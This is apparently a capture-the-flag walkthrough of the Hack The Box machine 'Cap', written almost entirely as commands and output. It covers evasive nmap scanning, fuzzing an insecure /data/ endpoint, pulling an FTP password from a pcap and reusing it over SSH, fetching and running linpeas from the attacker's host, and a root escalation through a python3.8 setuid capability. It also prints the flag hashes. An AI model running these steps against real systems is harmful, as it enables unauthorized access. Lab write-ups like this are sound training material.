Cap
Sun, 22 September 2024
Platform: Hack The Box
sudo nmap 10.10.10.245 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Nmap scan report for 10.10.10.245
Host is up (0.044s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 404 NOT FOUND
| Server: gunicorn
| Date: Thu, 19 Sep 2024 23:38:02 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 232
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
| <title>404 Not Found</title>
| <h1>Not Found</h1>
| <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
| GetRequest:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Thu, 19 Sep 2024 23:37:56 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Content-Length: 19386
| <!DOCTYPE html>
| <html class="no-js" lang="en">
| <head>
| <meta charset="utf-8">
| <meta http-equiv="x-ua-compatible" content="ie=edge">
| <title>Security Dashboard</title>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
| <link rel="stylesheet" href="/static/css/bootstrap.min.css">
| <link rel="stylesheet" href="/static/css/font-awesome.min.css">
| <link rel="stylesheet" href="/static/css/themify-icons.css">
| <link rel="stylesheet" href="/static/css/metisMenu.css">
| <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
| <link rel="stylesheet" href="/static/css/slicknav.min.css">
| <!-- amchar
| HTTPOptions:
| HTTP/1.0 200 OK
| Server: gunicorn
| Date: Thu, 19 Sep 2024 23:37:56 GMT
| Connection: close
| Content-Type: text/html; charset=utf-8
| Allow: HEAD, OPTIONS, GET
| Content-Length: 0
| RTSPRequest:
| HTTP/1.1 400 Bad Request
| Connection: close
| Content-Type: text/html
| Content-Length: 196
| <html>
| <head>
| <title>Bad Request</title>
| </head>
| <body>
| <h1><p>Bad Request</p></h1>
| Invalid HTTP Version 'Invalid HTTP Version: 'RTSP/1.0''
| </body>
|_ </html>
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 142.78 seconds
curl 10.10.10.245
<!DOCTYPE html>
<html class="no-js" lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<title>Security Dashboard</title>
...
<ul class="collapse">
<li class="active"><a href="/">Dashboard</a></li>
<li><a href="/capture">Security Snapshot (5 Second PCAP + Analysis)</a></li>
<li><a href="/ip">IP Config</a></li>
<li><a href="/netstat">Network Status</a></li>
</ul>
curl 10.10.10.245/capture
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/data/1">/data/1</a>. If not click the link.
curl 10.10.10.245/data/1
<button class="btn btn-info" onclick="location.href='/download/1'">Download</button>
curl 10.10.10.245/ip
<div class="main-content-inner">
<pre>
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.245 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 fe80::250:56ff:fe94:faf0 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:fe94:faf0 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:94:fa:f0 txqueuelen 1000 (Ethernet)
RX packets 120139 bytes 8006618 (8.0 MB)
RX errors 0 dropped 193 overruns 0 frame 0
TX packets 134592 bytes 9286853 (9.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 55456 bytes 4262438 (4.2 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 55456 bytes 4262438 (4.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0</pre>
</div>
</div>
<!-- main content area end -->
curl 10.10.10.245/netstat
<div class="main-content-inner">
<pre>
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State User Inode PID/Program name Timer
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1001 35718 - off (0.00/0/0)
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 101 34273 - off (0.00/0/0)
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 0 36249 - off (0.00/0/0)
tcp 0 0 10.10.10.245:80 10.10.16.7:55598 ESTABLISHED 1001 150386 - off (0.00/0/0)
tcp6 0 0 :::21 :::* LISTEN 0 35350 - off (0.00/0/0)
tcp6 0 0 :::22 :::* LISTEN 0 36260 - off (0.00/0/0)
udp 0 0 127.0.0.53:53 0.0.0.0:* 101 34272 - off (0.00/0/0)
udp 0 0 127.0.0.1:57466 127.0.0.53:53 ESTABLISHED 102 150572 - off (0.00/0/0)
udp 0 0 10.10.10.245:39422 1.1.1.1:53 ESTABLISHED 101 150573 - off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 2 [ ACC ] SEQPACKET LISTENING 27254 - /run/udev/control
unix 2 [ ACC ] STREAM LISTENING 27238 - @/org/kernel/linux/storage/multipathd
unix 3 [ ] DGRAM 27222 - /run/systemd/notify
unix 2 [ ACC ] STREAM LISTENING 27225 - /run/systemd/private
unix 2 [ ACC ] STREAM LISTENING 27227 - /run/systemd/userdb/io.systemd.DynamicUser
unix 2 [ ACC ] STREAM LISTENING 27236 - /run/lvm/lvmpolld.socket
unix 2 [ ] DGRAM 27239 - /run/systemd/journal/syslog
unix 6 [ ] DGRAM 27247 - /run/systemd/journal/dev-log
unix 2 [ ACC ] STREAM LISTENING 27249 - /run/systemd/journal/stdout
unix 8 [ ] DGRAM 27251 - /run/systemd/journal/socket
unix 2 [ ACC ] STREAM LISTENING 28087 - /run/systemd/journal/io.systemd.journal
unix 2 [ ACC ] STREAM LISTENING 32077 - /run/dbus/system_bus_socket
unix 2 [ ACC ] STREAM LISTENING 32084 - /run/snapd.socket
unix 2 [ ACC ] STREAM LISTENING 32086 - /run/snapd-snap.socket
unix 2 [ ACC ] STREAM LISTENING 32088 - /run/uuidd/request
unix 2 [ ACC ] STREAM LISTENING 32579 - /var/run/vmware/guestServicePipe
unix 2 [ ACC ] STREAM LISTENING 32669 - /run/irqbalance//irqbalance1025.sock
unix 2 [ ACC ] STREAM LISTENING 32081 - @ISCSIADM_ABSTRACT_NAMESPACE
unix 2 [ ACC ] STREAM LISTENING 32082 - /var/snap/lxd/common/lxd/unix.socket
unix 3 [ ] DGRAM 31637 -
unix 3 [ ] STREAM CONNECTED 31577 -
unix 3 [ ] STREAM CONNECTED 30535 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 29235 -
unix 3 [ ] STREAM CONNECTED 31181 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 36239 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 33683 -
unix 3 [ ] STREAM CONNECTED 35551 -
unix 3 [ ] STREAM CONNECTED 35653 -
unix 2 [ ] DGRAM 35040 -
unix 3 [ ] STREAM CONNECTED 35238 -
unix 3 [ ] STREAM CONNECTED 32979 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 35695 -
unix 3 [ ] STREAM CONNECTED 34922 -
unix 3 [ ] DGRAM 31635 -
unix 3 [ ] STREAM CONNECTED 95976 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 33046 -
unix 3 [ ] STREAM CONNECTED 28214 -
unix 3 [ ] STREAM CONNECTED 28490 -
unix 3 [ ] STREAM CONNECTED 36231 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 95979 -
unix 3 [ ] STREAM CONNECTED 97196 -
unix 3 [ ] STREAM CONNECTED 35690 -
unix 3 [ ] STREAM CONNECTED 34069 - /run/dbus/system_bus_socket
unix 2 [ ] DGRAM 31954 -
unix 3 [ ] STREAM CONNECTED 34071 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 34621 -
unix 3 [ ] STREAM CONNECTED 28353 - /run/systemd/journal/stdout
unix 3 [ ] DGRAM 31638 -
unix 3 [ ] STREAM CONNECTED 31517 -
unix 3 [ ] STREAM CONNECTED 36107 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 33920 -
unix 3 [ ] STREAM CONNECTED 35694 -
unix 3 [ ] STREAM CONNECTED 31180 -
unix 2 [ ] DGRAM 31633 -
unix 3 [ ] STREAM CONNECTED 33844 -
unix 3 [ ] STREAM CONNECTED 31578 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 32978 -
unix 3 [ ] STREAM CONNECTED 35691 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 33684 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 33600 -
unix 3 [ ] STREAM CONNECTED 32080 -
unix 3 [ ] DGRAM 31636 -
unix 2 [ ] DGRAM 28090 -
unix 3 [ ] STREAM CONNECTED 31183 - /run/systemd/journal/stdout
unix 2 [ ] DGRAM 36766 -
unix 3 [ ] STREAM CONNECTED 95980 - /run/dbus/system_bus_socket
unix 2 [ ] DGRAM 34041 -
unix 3 [ ] STREAM CONNECTED 34270 -
unix 3 [ ] STREAM CONNECTED 33606 - /run/systemd/journal/stdout
unix 3 [ ] DGRAM 27224 -
unix 3 [ ] STREAM CONNECTED 34067 -
unix 3 [ ] DGRAM 28503 -
unix 3 [ ] DGRAM 27223 -
unix 3 [ ] STREAM CONNECTED 34070 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 29680 -
unix 2 [ ] DGRAM 35643 -
unix 3 [ ] STREAM CONNECTED 34068 - /run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 32909 -
unix 3 [ ] DGRAM 27381 -
unix 3 [ ] DGRAM 28501 -
unix 2 [ ] DGRAM 27378 -
unix 3 [ ] STREAM CONNECTED 36238 - /run/dbus/system_bus_socket
unix 3 [ ] DGRAM 28500 -
unix 3 [ ] DGRAM 27380 -
unix 3 [ ] STREAM CONNECTED 36014 - /run/systemd/journal/stdout
unix 2 [ ] DGRAM 27399 -
unix 3 [ ] STREAM CONNECTED 33846 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 35652 -
unix 3 [ ] STREAM CONNECTED 32100 -
unix 3 [ ] STREAM CONNECTED 33047 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 34066 -
unix 2 [ ] DGRAM 28494 -
unix 3 [ ] STREAM CONNECTED 34271 - /run/dbus/system_bus_socket
unix 2 [ ] DGRAM 34052 -
unix 2 [ ] DGRAM 34065 -
unix 3 [ ] DGRAM 28502 -
unix 3 [ ] STREAM CONNECTED 35145 30877/sh
unix 3 [ ] STREAM CONNECTED 34622 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 33921 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 28569 - /run/systemd/journal/stdout
unix 3 [ ] STREAM CONNECTED 31518 - /run/systemd/journal/stdout
</pre>
</div>
</div>
<!-- main content area end -->
ffuf -u "http://10.10.10.245/data/FUZZ" -v \
-w /usr/share/seclists/Fuzzing/3-digits-000-999.txt -fs 208
[Status: 200, Size: 17147, Words: 7066, Lines: 371, Duration: 49ms]
| URL | http://10.10.10.245/data/000
* FUZZ: 000
curl http://10.10.10.245/download/000 -o 0.pcap
wireshark 0.pcap
34 2.626895 192.168.196.16 192.168.196.1 FTP 76 Response: 220 (vsFTPd 3.0.3)
35 2.667693 192.168.196.1 192.168.196.16 TCP 62 54411 → 21 [ACK] Seq=1 Ack=21 Win=1051136 Len=0
36 4.126500 192.168.196.1 192.168.196.16 FTP 69 Request: USER nathan
37 4.126526 192.168.196.16 192.168.196.1 TCP 56 21 → 54411 [ACK] Seq=21 Ack=14 Win=64256 Len=0
38 4.126630 192.168.196.16 192.168.196.1 FTP 90 Response: 331 Please specify the password.
39 4.167701 192.168.196.1 192.168.196.16 TCP 62 54411 → 21 [ACK] Seq=14 Ack=55 Win=1051136 Len=0
40 5.424998 192.168.196.1 192.168.196.16 FTP 78 Request: PASS Buck3tH4TF0RM3!
41 5.425034 192.168.196.16 192.168.196.1 TCP 56 21 → 54411 [ACK] Seq=55 Ack=36 Win=64256 Len=0
42 5.432387 192.168.196.16 192.168.196.1 FTP 79 Response: 230 Login successful.
USER nathan
PASS Buck3tH4TF0RM3!
Response: 230 Login successful.
ssh nathan@10.10.10.245
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Sep 22 18:47:09 UTC 2024
System load: 0.0
Usage of /: 37.1% of 8.73GB
Memory usage: 22%
Swap usage: 0%
Processes: 229
Users logged in: 0
IPv4 address for eth0: 10.10.10.245
IPv6 address for eth0: dead:beef::250:56ff:fe94:faf0
=> There are 4 zombie processes.
63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Sep 22 12:48:29 2024 from 10.10.14.8
nathan@cap:~$ cat user.txt
cf0ce0f0f7d7b8e2e37bd40df907d3d2
nathan@cap:~$ curl 10.10.16.7:8088/linpeas.sh -O
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- 30 828k 30 251k 0 0 497k 0 0:00:01 --:--:-- 80 828k 80 670k 0 0 445k 0 0:00:01 0:00:01 100 828k 100 828k 0 0 515k 0 0:00:01 0:00:01 --:--:-- 515k
nathan@cap:~$ bash ./linpeas.sh
Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
nathan@cap:~$ /usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash");'
root@cap:~# cat /root/root.txt
04e8b55845d140be7788531e21a6079f